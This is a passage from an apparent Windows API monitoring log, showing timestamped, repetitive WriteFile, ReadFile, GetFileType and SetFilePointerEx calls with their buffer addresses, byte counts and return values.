lpOverlapped=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] GetFileType (hFile=0x50) returned 0x1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] GetFileType (hFile=0x50) returned 0x1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.870] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] GetFileType (hFile=0x50) returned 0x1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] GetFileType (hFile=0x50) returned 0x1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] GetFileType (hFile=0x50) returned 0x1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] GetFileType (hFile=0x50) returned 0x1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 
| out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] GetFileType (hFile=0x50) returned 0x1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] GetFileType (hFile=0x50) returned 0x1 [0119.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.871] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.871] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.872] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] GetFileType (hFile=0x50) returned 0x1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] GetFileType (hFile=0x50) returned 0x1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] GetFileType (hFile=0x50) returned 0x1 [0119.872] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0119.872] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] GetFileType (hFile=0x50) returned 0x1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] GetFileType (hFile=0x50) returned 0x1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] GetFileType (hFile=0x50) returned 0x1 [0119.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.872] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.873] GetFileType (hFile=0x50) returned 0x1 [0119.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.873] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.873] GetFileType (hFile=0x50) returned 0x1 [0119.873] _get_osfhandle (_FileHandle=1) returned 0x50 
[0119.873] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.873] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.873] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.873] GetFileType (hFile=0x50) returned 0x1 [0119.873] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.873] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, 
lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile 
(in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.875] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 
[0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.876] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, 
lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.877] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, 
lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.878] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: 
lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.879] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, 
lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.880] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, 